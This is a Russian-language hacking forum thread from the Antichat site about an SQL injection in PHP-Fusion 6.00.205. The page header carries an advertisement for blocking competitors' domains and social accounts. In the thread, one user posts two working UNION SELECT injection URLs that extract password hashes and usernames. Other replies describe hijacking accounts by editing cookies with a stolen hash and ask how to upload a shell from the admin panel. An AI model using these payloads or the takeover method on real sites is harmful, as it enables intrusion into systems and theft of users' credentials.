Форум АНТИЧАТ - php-fusion 6.00.205 sql-injection

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
php-fusion 6.00.205 sql-injection

Опции темы

Поиск в этой теме

Опции просмотра

php-fusion 6.00.205 sql-injection

27.11.2005, 23:31

sn0w

Статус пользователя:

Регистрация: 26.07.2005

Сообщений: 568

Провел на форуме:
1290766

Репутация: 1236

php-fusion 6.00.205 sql-injection

Прежде всего спасибо ZaCo (xaxa3217) - sql нашел именно он!))) а сайт - я))) . По мере того как линки будут умирать (webfile.ru)) я добавлю новые. Кстати ZaCo гдето запостил сам sql запрос. вот. поэтому не буду повторять. Итак видео щас тут: webfile.ru/657729

__________________

snow white world wide

28.11.2005, 00:05

k1b0rg

Тут может быть ваша реклама.

Регистрация: 30.07.2005

Сообщений: 1,243

Провел на форуме:
4520553

Репутация: 1316

выложи сплойт

28.11.2005, 00:10

~~africanec~~

Banned

Регистрация: 11.09.2005

Сообщений: 254

Провел на форуме:
1002567

Репутация: -12

Отправить сообщение для africanec с помощью ICQ

смори грин мишка создавал тему непомню как называеться

28.11.2005, 00:12

sn0w

Статус пользователя:

Регистрация: 26.07.2005

Сообщений: 568

Провел на форуме:
1290766

Репутация: 1236

мд5 хэши
/messages.php?folder=inbox&show='%20union%20select% 201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

имена
/messages.php?folder=inbox&show='%20union%20select% 201,1,1,user_name,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

надо быть залогиненным

__________________

snow white world wide

28.11.2005, 14:57

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

Достаточно было взять хешку и подредактировать куки.. даже имя пользователя знать не надо, просто в куках меняеш айди. эт я про видео.

__________________
Фреймворк для спамера :(
Услуги программирования

07.12.2005, 00:47

ilyha

Познающий

Регистрация: 10.11.2005

Сообщений: 75

Провел на форуме:
367531

Репутация: 4

А шелл, как в него залить из админки?

23.12.2005, 16:44

sn0w

Статус пользователя:

Регистрация: 26.07.2005

Сообщений: 568

Провел на форуме:
1290766

Репутация: 1236

шелл я не заливал, но попробуй качнуть к примеру из полученной админки

__________________

snow white world wide

12.05.2008, 18:33

Blacksmith

Новичок

Регистрация: 30.03.2008

Сообщений: 12

Провел на форуме:
82525

Репутация: 1

Есть подобный скуль для версии PHP-Fusion 6.01.3.01 ?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход